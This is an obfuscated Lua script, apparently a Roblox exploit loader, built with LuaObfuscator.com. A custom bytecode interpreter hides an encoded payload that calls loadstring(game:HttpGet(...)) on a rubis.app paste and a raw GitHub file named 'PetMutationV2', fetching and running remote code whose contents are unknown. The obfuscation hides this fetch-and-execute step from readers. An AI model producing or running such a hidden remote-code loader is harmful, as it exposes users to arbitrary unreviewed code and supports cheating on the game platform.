--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then local v87=0;while true do if (v87==0) then v19=v0(v3(v30,1,1));return "";end end else local v88=v2(v0(v30,16));if v19 then local v113=0;local v114;while true do if (v113==1) then return v114;end if (v113==0) then v114=v5(v88,v19);v19=nil;v113=1;end end else return v88;end end end);local function v20(v31,v32,v33) if v33 then local v89=(v31/((5 -3)^(v32-(2 -1))))%(2^(((v33-(1 -(1637 -(1523 + 114)))) -(v32-(2 -1))) + (1 -0))) ;return v89-(v89%(620 -(555 + 58 + 6))) ;else local v90=931 -(857 + 74) ;local v91;while true do if (v90==(568 -(367 + 201))) then v91=(929 -(214 + 713))^(v32-(1 + 0)) ;return (((v31%(v91 + v91))>=v91) and ((1066 -(68 + 997)) + 0)) or (877 -(282 + 595)) ;end end end end local function v21() local v34=(2227 -(892 + 65)) -(226 + 1044) ;local v35;while true do if (v34==1) then return v35;end if (v34==(0 -0)) then v35=v1(v16,v18,v18);v18=v18 + 1 ;v34=1 + 0 ;end end end local function v22() local v36,v37=v1(v16,v18,v18 + (4 -2) );v18=v18 + (3 -1) ;return (v37 * (469 -213)) + v36 ;end local function v23() local v38=952 -(802 + 150) ;local v39;local v40;local v41;local v42;while true do if (v38==((205 + 146) -(87 + 263))) then return (v42 * (16777396 -(67 + (148 -35)))) + (v41 * (48056 + (18667 -(1069 + 118)))) + (v40 * (628 -372)) + v39 ;end if (v38==(0 -0)) then v39,v40,v41,v42=v1(v16,v18,v18 + 3 + 0 );v18=v18 + (1001 -(915 + 82)) ;v38=3 -2 ;end end end local function v24() local v43=0 -0 ;local v44;local v45;local v46;local v47;local v48;local v49;while true do if (v43==(3 -2)) then v46=2 -1 ;v47=(v20(v45,1 -0 ,4 + 16 ) * ((3 -1)^32)) + v44 ;v43=2 + (0 -0) ;end if (v43==(793 -(368 + 423))) then v48=v20(v45,65 -44 ,49 -(10 + 8) );v49=((v20(v45,(1535 -(447 + 966)) -90 )==(3 -2)) and  -(443 -(416 + (71 -45)))) or (3 -2) ;v43=2 + 1 ;end if (v43==(0 -0)) then v44=v23();v45=v23();v43=1748 -(760 + 987) ;end if (v43==(1916 -(1789 + 124))) then if (v48==(438 -(145 + (2110 -(1703 + 114))))) then if (v47==((1131 -(376 + 325)) -(44 + 386))) then return v49 * (0 -0) ;else v48=(2436 -949) -(998 + 488) ;v46=0 + 0 ;end elseif (v48==(8029 -5982)) then return ((v47==(0 + 0)) and (v49 * (((2 -1) + 0 + 0)/(772 -(201 + 571))))) or (v49 * NaN) ;end return v8(v49,v48-(2161 -(116 + 1022)) ) * (v46 + (v47/((8 -6)^(31 + 21)))) ;end end end local function v25(v50) local v51=0;local v52;local v53;while true do if (v51==(6 -3)) then return v6(v53);end if (v51==(16 -(9 + 5))) then v53={};for v115=1, #v52 do v53[v115]=v2(v1(v3(v52,v115,v115)));end v51=379 -(85 + 291) ;end if (v51==(1265 -(243 + 1022))) then v52=nil;if  not v50 then local v121=0 -0 ;while true do if (v121==(0 + 0 + 0)) then v50=v23();if (v50==0) then return "";end break;end end end v51=(4159 -2978) -(1123 + 57) ;end if (v51==(1 + 0)) then v52=v3(v16,v18,(v18 + v50) -(255 -(163 + (139 -48))) );v18=v18 + v50 ;v51=1932 -(1869 + 61) ;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v54=(function() return function(v92,v93,v94,v95,v96,v97,v98,v99) local v92=(function() return 166 -(122 + 44) ;end)();local v93=(function() return;end)();local v95=(function() return;end)();while true do if ((0 + 0)==v92) then local v122=(function() return 0 -0 ;end)();local v123=(function() return;end)();while true do if (v122==(0 -0)) then v123=(function() return 0 + 0 ;end)();while true do if (v123~=(1025 -(706 + 318))) then else v92=(function() return  #" ";end)();break;end if (v123~=0) then else v93=(function() return v94();end)();v95=(function() return nil;end)();v123=(function() return 1;end)();end end break;end end end if (v92== #"{") then if (v93== #"|") then v95=(function() return v94()~=(1251 -(721 + 530)) ;end)();elseif (v93==(1273 -(945 + 326))) then v95=(function() return v96();end)();elseif (v93== #"gha") then v95=(function() return v97();end)();end v98[v99]=(function() return v95;end)();break;end end return v92,v93,v94,v95,v96,v97,v98,v99;end;end)();local v55=(function() return function(v100,v101,v102) local v103=(function() return 0 -0 ;end)();local v104=(function() return;end)();while true do if (v103~=(0 + 0)) then else v104=(function() return 0 + 0 ;end)();while true do if (v104==(700 -(271 + 429))) then local v128=(function() return 1257 -(1043 + 214) ;end)();while true do if ((0 + 0)==v128) then local v180=(function() return 0;end)();while true do if (v180==(0 -0)) then v100[v101-#"<" ]=(function() return v102();end)();return v100,v101,v102;end end end end end end break;end end end;end)();local v56=(function() return {};end)();local v57=(function() return {};end)();local v58=(function() return {};end)();local v59=(function() return {v56,v57,nil,v58};end)();local v60=(function() return v23();end)();local v61=(function() return {};end)();for v69= #":",v60 do FlatIdent_20FB0,Type,v21,Cons,v24,v25,v61,v69=(function() return v54(FlatIdent_20FB0,Type,v21,Cons,v24,v25,v61,v69);end)();end v59[ #"91("]=(function() return v21();end)();for v70= #"}",v23() do local v71=(function() return v21();end)();if (v20(v71, #":", #"<")==(0 -0)) then local v108=(function() return 0;end)();local v109=(function() return;end)();local v110=(function() return;end)();local v111=(function() return;end)();local v112=(function() return;end)();while true do if (v108~=(1501 -(1408 + 92))) then else local v125=(function() return 580 -(361 + 219) ;end)();local v126=(function() return;end)();while true do if ((1086 -(461 + 625))==v125) then v126=(function() return 1288 -(993 + 295) ;end)();while true do if (v126==(321 -(53 + 267))) then v108=(function() return 1 + 1 ;end)();break;end if ((0 + 0)~=v126) then else v111=(function() return nil;end)();v112=(function() return nil;end)();v126=(function() return 1172 -(418 + 753) ;end)();end end break;end end end if (v108==(982 -(18 + 964))) then local v127=(function() return 0 -0 ;end)();while true do if (v127==(0 + 0)) then v109=(function() return 0 + 0 ;end)();v110=(function() return nil;end)();v127=(function() return 1 + 0 ;end)();end if (v127~=1) then else v108=(function() return 851 -(20 + 830) ;end)();break;end end end if (v108==2) then while true do if (v109== #"gha") then if (v20(v111, #"gha", #"-19")== #"]") then v112[ #".com"]=(function() return v61[v112[ #".dev"]];end)();end v56[v70]=(function() return v112;end)();break;end if ( #"/"==v109) then local v157=(function() return 0 + 0 ;end)();local v158=(function() return;end)();while true do if ((529 -(406 + 123))~=v157) then else v158=(function() return 126 -(116 + 10) ;end)();while true do if (v158==(1 + 0)) then v109=(function() return 1771 -(1749 + 20) ;end)();break;end if (v158~=(0 + 0)) then else v112=(function() return {v22(),v22(),nil,nil};end)();if (v110==0) then local v193=(function() return 1322 -(1249 + 73) ;end)();local v194=(function() return;end)();while true do if (v193==(0 + 0)) then v194=(function() return 0 + 0 ;end)();while true do if (v194~=(0 + 0)) then else v112[ #"gha"]=(function() return v22();end)();v112[ #"xnxx"]=(function() return v22();end)();break;end end break;end end elseif (v110== #"~") then v112[ #"19("]=(function() return v23();end)();elseif (v110==(1147 -(466 + 679))) then v112[ #"gha"]=(function() return v23() -((4 -2)^(45 -29)) ;end)();elseif (v110== #"asd") then local v203=(function() return 0 + 0 ;end)();local v204=(function() return;end)();while true do if (v203==(1900 -(106 + 1794))) then v204=(function() return 0 + 0 ;end)();while true do if (v204==(0 + 0)) then v112[ #"asd"]=(function() return v23() -((5 -3)^16) ;end)();v112[ #".dev"]=(function() return v22();end)();break;end end break;end end end v158=(function() return 1552 -(1126 + 425) ;end)();end end break;end end end if (v109~=0) then else local v159=(function() return 0 -0 ;end)();local v160=(function() return;end)();while true do if (v159~=(114 -(4 + 110))) then else v160=(function() return 584 -(57 + 527) ;end)();while true do if (v160==(1122 -(118 + 1003))) then v109=(function() return  #".";end)();break;end if (v160==(1427 -(41 + 1386))) then v110=(function() return v20(v71,2, #"-19");end)();v111=(function() return v20(v71, #"0836",17 -11 );end)();v160=(function() return 1;end)();end end break;end end end if (v109==2) then local v161=(function() return 0;end)();local v162=(function() return;end)();while true do if (v161~=0) then else v162=(function() return 103 -(17 + 86) ;end)();while true do if (1==v162) then v109=(function() return  #"xnx";end)();break;end if (v162==0) then if (v20(v111, #"{", #"[")== #"/") then v112[2 + 0 ]=(function() return v61[v112[3 -1 ]];end)();end if (v20(v111,2,5 -3 )== #"~") then v112[ #"91("]=(function() return v61[v112[ #"gha"]];end)();end v162=(function() return 1;end)();end end break;end end end end break;end end end end for v72= #">",v23() do v57,v72,v28=(function() return v55(v57,v72,v28);end)();end return v59;end local function v29(v63,v64,v65) local v66=v63[1 + 0 ];local v67=v63[2 + 0 ];local v68=v63[980 -(553 + 424) ];return function(...) local v73=v66;local v74=v67;local v75=v68;local v76=v27;local v77=1 -0 ;local v78= -(1 + 0);local v79={};local v80={...};local v81=v12("#",...) -(1 + 0) ;local v82={};local v83={};for v105=0 + 0 ,v81 do if (v105>=v75) then v79[v105-v75 ]=v80[v105 + (2 -1) ];else v83[v105]=v80[v105 + 1 + 0 ];end end local v84=(v81-v75) + 1 ;local v85;local v86;while true do v85=v73[v77];v86=v85[2 -1 ];if (v86<=(13 -8)) then if (v86<=((3115 -(927 + 959)) -(322 + 905))) then if ((4358==4358) and (v86<=(611 -(602 + 9)))) then v83[v85[4 -2 ]]();elseif ((v86>(1 + 0)) or (3138<993)) then for v182=v85[9 -7 ],v85[950 -(245 + 702) ] do v83[v182]=nil;end else local v165=v85[755 -(239 + 514) ];local v166=v83[v85[2 + 1 ]];v83[v165 + (1330 -(797 + 532)) ]=v166;v83[v165]=v166[v85[4]];end elseif ((3330>2323) and (v86<=(3 + 0))) then v77=v85[443 -(382 + 58) ];elseif ((v86==(2 + 2)) or (3626==3989)) then v83[v85[4 -2 ]]=v85[1205 -(373 + (2794 -1965)) ]~=0 ;else do return;end end elseif (v86<=8) then if (v86<=(17 -(743 -(16 + 716)))) then local v130;local v131,v132;local v133;local v134;v83[v85[733 -(476 + 255) ]]=v65[v85[1133 -(369 + 761) ]];v77=v77 + ((1 -0) -0) ;v85=v73[v77];v134=v85[2 + 0 ];v133=v83[v85[6 -3 ]];v83[v134 + 1 + 0 ]=v133;v83[v134]=v133[v85[6 -2 ]];v77=v77 + ((98 -(11 + 86)) -(0 -0)) ;v85=v73[v77];v83[v85[240 -(64 + 174) ]]=v85[(286 -(175 + 110)) + 2 ];v77=v77 + (684 -(483 + 200)) ;v85=v73[v77];v83[v85[2 -0 ]]=v85[8 -5 ]~=(336 -(144 + 192)) ;v77=v77 + ((547 -330) -(42 + 174)) ;v85=v73[v77];v134=v85[767 -(468 + 297) ];v131,v132=v76(v83[v134](v13(v83,v134 + 1 + 0 ,v85[(14 -11) + (1796 -(503 + 1293)) ])));v78=(v132 + v134) -(1 + 0) ;v130=0 -0 ;for v163=v134,v78 do local v164=0 -0 ;while true do if ((1504 -((1013 -650) + 1141))==v164) then v130=v130 + (1581 -(856 + 327 + 397)) ;v83[v163]=v131[v130];break;end end end v77=v77 + (2 -1) ;v85=v73[v77];v134=v85[2 + 0 ];v83[v134]=v83[v134](v13(v83,v134 + (2 -1) ,v78));v77=v77 + 1 + (1061 -(810 + 251)) ;v85=v73[v77];v83[v85[1977 -(1328 + 585 + 20 + 42) ]]();v77=v77 + 1 + 0 ;v85=v73[v77];v83[v85[(5 + 0) -3 ]]=v65[v85[2 + 1 ]];v77=v77 + (1934 -(565 + 1368)) ;v85=v73[v77];v83[v85[7 -5 ]]=v65[v85[4 -1 ]];v77=v77 + 1 + 0 ;v85=v73[v77];v134=v85[1663 -(1477 + 184) ];v133=v83[v85[3 -(533 -(43 + 490)) ]];v83[v134 + 1 + 0 ]=v133;v83[v134]=v133[v85[4 + 0 ]];elseif (v86==(772 -(574 + 191))) then local v171=856 -((1297 -(711 + 22)) + 292) ;local v172;local v173;local v174;local v175;while true do if (v171==(0 -0)) then v172=v85[5 -(11 -8) ];v173,v174=v76(v83[v172](v13(v83,v172 + (305 -(244 + 60)) ,v85[3 + 0 ])));v171=477 -(41 + 435) ;end if ((v171==(4 -2)) or (916==2671)) then for v191=v172,v78 do local v192=859 -(240 + 619) ;while true do if ((272==272) and (v192==(1001 -(938 + 63)))) then v175=v175 + 1 + 0 ;v83[v191]=v173[v175];break;end end end break;end if ((850 -(254 + 595))==v171) then v78=(v174 + v172) -(1126 -(936 + 189)) ;v175=0 + 0 + 0 ;v171=1792 -(573 + 1217) ;end end elseif (v83[v85[5 -3 ]]==v85[1617 -(1565 + 48) ]) then v77=v77 + 1 + 0 ;else v77=v85[4 -1 ];end elseif ((4249<=4839) and (v86<=(6 + 3))) then v83[v85[1140 -(782 + 356) ]]=v65[v85[270 -(176 + 91) ]];elseif (v86==(2 + 8)) then v83[v85[4 -2 ]]=v85[4 -1 ];else local v178=1092 -(975 + 117) ;local v179;while true do if (v178==0) then v179=v85[808 -(118 + 688) ];v83[v179]=v83[v179](v13(v83,v179 + (1876 -(157 + 1718)) ,v78));break;end end end v77=v77 + 1 + (0 -0) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!063Q00028Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403333Q00682Q7470733A2Q2F6170692E72756269732E612Q702F76322F73637261702F625342496B7A5249586B7057756463552F726177034E3Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F4372696D736F6E2D4C61672F2Q782F726566732F68656164732F6D61696E2F5065744D75746174696F6E5632001B3Q00120A3Q00014Q0002000100013Q0026083Q0002000100010004033Q0002000100120A000100013Q00260800010005000100010004033Q00050001001209000200023Q001206000300033Q00202Q00030003000400122Q000500056Q000600016Q000300066Q00023Q00024Q00020001000100122Q000200023Q00122Q000300033Q00202Q00030003000400120A000500064Q0007000300054Q000B00023Q00024Q0002000100010004033Q001A00010004033Q000500010004033Q001A00010004033Q000200012Q00053Q00017Q00",v9(),...);
